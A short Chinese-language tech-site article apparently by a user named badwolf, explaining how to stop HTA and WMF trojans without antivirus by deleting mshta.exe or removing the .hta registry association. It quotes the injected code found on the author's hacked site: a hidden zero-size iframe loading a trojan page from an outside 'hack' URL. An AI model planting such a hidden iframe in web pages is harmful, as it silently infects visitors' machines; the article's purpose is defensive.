科技行者

行者学院 转型私董会 科技行者专题报道 网红大战科技行者

知识库

知识库 安全导航

至顶网网络频道不用杀毒软件防止hta或wmf木马!

不用杀毒软件防止hta或wmf木马!

  • 扫一扫
    分享文章到微信

  • 扫一扫
    关注官方公众号
    至顶头条

好开始这里介绍1下用1个简单的方法彻底禁止他木马在你机器运行 当打开挂马页面,也只会下载个*.hta文件并不会运行,也就不会中木马了..其他格式的木马也差不多例如*.wmf的也用同样方法。
  • 评论
  • 分享微博
  • 分享邮件

  让人挂马了,真是郁闷~

  木马代码如下 

CODE:  [Copy to clipboard] 
--------------------------------------------------------------------------------
<IFRAME marginWidth=0 marginHeight=0 src="http://www.cnbct.be/hack/joke.htm" frameBorder=0 width=0 scrolling=no height=0></IFRAME>
       是hta自动弹出的木马,

  我查看他的木马页面里windows.htm里

  代码内容加了一些空格,基本可以躲避过杀毒软件的查杀

  对于没有对付木马经验的人,机器已经中标了...

  身为黑基的人,我badwolf需要为黑基地人做点事~

  好开始这里介绍1下用1个简单的方法彻底禁止他木马在你机器运行

  看这个

  C:/WINDOWS/system32/mshta.exe

  这个是运行*.hta文件的exe文件

  1是删除这个exe文件

  或者进入注册表

  搜索.hta 然后把相对应的注册表导出

  然后删除他

  也就删除了*.hta扩展名文件与mshta.exe的注册表关联

  所以当打开挂马页面,也只会下载个*.hta文件并不会运行

  也就不会中木马了..

  其他格式的木马也差不多例如*.wmf的也用同样方法。

    • 评论
    • 分享微博
    • 分享邮件
    邮件订阅

    如果您非常迫切的想了解IT领域最新产品与技术信息,那么订阅至顶网技术邮件将是您的最佳途径之一。

    重磅专题
    往期文章
    最新文章